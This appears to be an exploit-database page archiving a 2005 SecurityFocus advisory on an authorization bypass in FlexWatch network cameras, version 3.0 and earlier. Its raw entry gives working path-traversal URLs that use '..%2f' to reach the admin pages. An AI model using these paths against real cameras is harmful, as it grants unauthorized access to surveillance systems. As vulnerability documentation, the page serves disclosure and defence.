header-logo
Suggest Exploit
vendor:
FlexWatch
by:
SecurityFocus
7.5
CVSS
HIGH
Authorization-Bypass
287
CWE
Product Name: FlexWatch
Affected Version From: 3
Affected Version To: Prior versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

FlexWatch Authorization-Bypass Vulnerability

FlexWatch is prone to an authorization-bypass vulnerability. This issue is due to a failure in the application to properly verify user-supplied input. An attacker can exploit this issue to bypass the authorization mechanism. This allows the attacker to gain unauthorized access to the surveillance system.

Mitigation:

Ensure that user-supplied input is properly verified and that access to protected pages is restricted.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18948/info

FlexWatch is prone to an authorization-bypass vulnerability. This issue is due to a failure in the application to properly verify user-supplied input.

An attacker can exploit this issue to bypass the authorization mechanism. This allows the attacker to gain unauthorized access to the surveillance system.

Versions 3.0 and prior are affected.

An attacker can bypass the protection of protected pages using /..%2f and access to administrative area: Network Camera V3.0: http:www.exampe.com//camera/..%2fadmin/aindex.asp Networks Camera Prior versions: http://www.example.com/camera/app/..%2fadmin/aindex.htm

Navigation

Suggest Exploit

Services By CQR